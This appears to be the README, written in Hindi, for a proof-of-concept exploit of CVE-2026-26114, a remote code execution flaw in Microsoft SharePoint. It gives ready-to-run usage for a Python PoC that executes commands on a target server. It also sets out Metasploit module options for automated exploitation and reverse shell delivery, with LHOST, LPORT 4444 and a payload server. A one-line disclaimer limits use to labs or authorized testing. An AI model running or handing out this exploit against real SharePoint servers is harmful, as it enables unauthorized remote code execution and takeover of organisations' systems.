
प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट CVE-2026-26114 के लिए, Microsoft SharePoint में एक रिमोट कोड एक्ज़ीक्यूशन भेद्यता, Python PoC और Metasploit मॉड्यूल के साथ स्वचालित शोषण और रिवर्स शेल डिलीवरी के लिए।
केवल प्रयोगशाला या अधिकृत परीक्षण प्रणालियों में उपयोग करें।
pip install requests requests-ntlm
python poc/cve_2026_26114_rce.py ^
--target http://sharepoint.local ^
--username sp_user1 ^
--password "Password123!" ^
--domain SP19 ^
--cmd "cmd /c whoami > C:\Windows\Temp\cve_2026_26114.txt"
आप --proxy http://127.0.0.1:8080, --insecure का उपयोग कर सकते हैं, या --cmd को --marker-file C:\Windows\Temp\marker.txt से बदल सकते हैं।
मॉड्यूल यहाँ स्थित है:
modules/exploits/windows/http/sharepoint_cve_2026_26114.rb
उदाहरण विकल्प:
use exploit/windows/http/sharepoint_cve_2026_26114
set RHOSTS sharepoint.local
set RPORT 80
set SSL false
set TARGETURI /
set USERNAME sp_user1
set PASSWORD Password123!
set DOMAIN SP19
set SRVHOST 192.168.56.1
set SRVPORT 8080
set LHOST 192.168.56.1
set LPORT 4444
check
run
यदि ऑटो-डिस्कवरी का उपयोग नहीं कर रहे हैं, तो TAXONOMY_STORE_ID, TAXONOMY_GROUP_ID, SITE_ID, WEB_ID, JOB_CREATOR_ID भी सेट करें।